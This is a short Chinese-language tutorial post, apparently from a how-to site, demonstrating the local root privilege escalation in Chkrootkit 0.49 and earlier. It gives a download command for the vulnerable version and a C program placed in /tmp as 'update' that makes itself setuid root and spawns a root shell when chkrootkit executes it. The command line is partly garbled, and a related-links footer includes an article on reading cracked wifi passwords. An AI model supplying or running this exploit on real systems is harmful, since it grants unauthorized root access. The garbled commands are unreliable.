Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:
可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:
wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/
./chkrootkit -V
普通用户在 /tmp 目录下新建 update.c(代码实示例如下):
#include <unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}
然后编译好 update ,看下update的文件详情:
执行有漏洞的 chkrootkit :
再来看下 update 已经成功属于 root 组了!
以上就是查看自己 Ckrootkit 0.49 是不是安装的是不是升到最新版了,或者下载有漏洞的版本进行实验的步骤,谢谢阅读,希望能帮到大家,请继续关注查字典教程网,我们会努力分享更多优秀的文章。
【安全漏洞:Chkrootkit 0.49 本地提权漏洞的测试方法】相关文章:
★ 局域网共享文件管理之如何设置共享文件的不同访问权限、保护共享文件安全
★ 局域网工作组有什么作用 怎么判断两台电脑是不是在一个工作组内
★ 用局域网网速控制软件、局域网带宽分配软件教你怎么限制局域网网速
★ dns服务器地址大全 全国主要省份电信/网通/铁通dns地址汇总
★ wifi破解后的密码怎么查看?查看wifi破解后的密码图文方法